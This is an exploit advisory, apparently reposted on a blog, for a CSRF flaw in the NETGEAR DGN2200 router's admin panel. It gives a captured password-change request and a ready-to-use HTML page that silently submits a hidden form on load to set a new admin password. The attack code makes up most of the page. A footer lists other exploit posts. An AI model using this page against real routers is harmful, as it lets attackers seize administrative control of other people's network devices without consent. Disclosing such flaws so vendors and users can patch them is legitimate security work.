728x90
# Exploit Title: CSRF in NETGEAR DGN2200 Admin panel
# Date 02/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://netgear.com
# Affected Firmware version: 1.0.0.29_1.7.29_HotS
# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router
Summary
=======
A CSRF Attack was discovered in the Admin panel of NETGEAR DGN2200 Router.
Vulnerability Description
=========================
Cross Site Request Forgery attack (CSRF)
PoC
====
POST /password.cgi HTTP/1.1
Host: 10.0.0.138
Proxy-Connection: keep-alive
Content-Length: 122
Cache-Control: max-age=0
Authorization: Basic QWRtaW46VG9vbGJveDEj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.138
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.138/PWD_password.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS&authTimeout=5&cfAlert_Apply=Apply
Exploit
=========
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Admin password</H2>
<form method="POST" name="form0" action="http://10.0.0.138/password.cgi">
<input type="hidden" name="sysOldPasswd" value="OLDPASS"/>
<input type="hidden" name="sysNewPasswd" value="NEWPASS"/>
<input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/>
<input type="hidden" name="authTImeout" value="5"/>
<input type="hidden" name="cfAlert_Apply" value="Apply"/>
</form>
</body>
</html>
728x90
'Metasploit ' 카테고리의 다른 글
Yokogawa CS3000 BKESimmgr.exe Buffer Overflow (0) | 2014.05.10 |
---|---|
Seagate BlackArmor NAS - Multiple Vulnerabilities (0) | 2014.05.05 |
F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (0) | 2014.05.03 |
Apache Struts ClassLoader Manipulation Remote Code Execution (0) | 2014.05.03 |
AlienVault OSSIM SQL Injection and Remote Code Execution (0) | 2014.05.03 |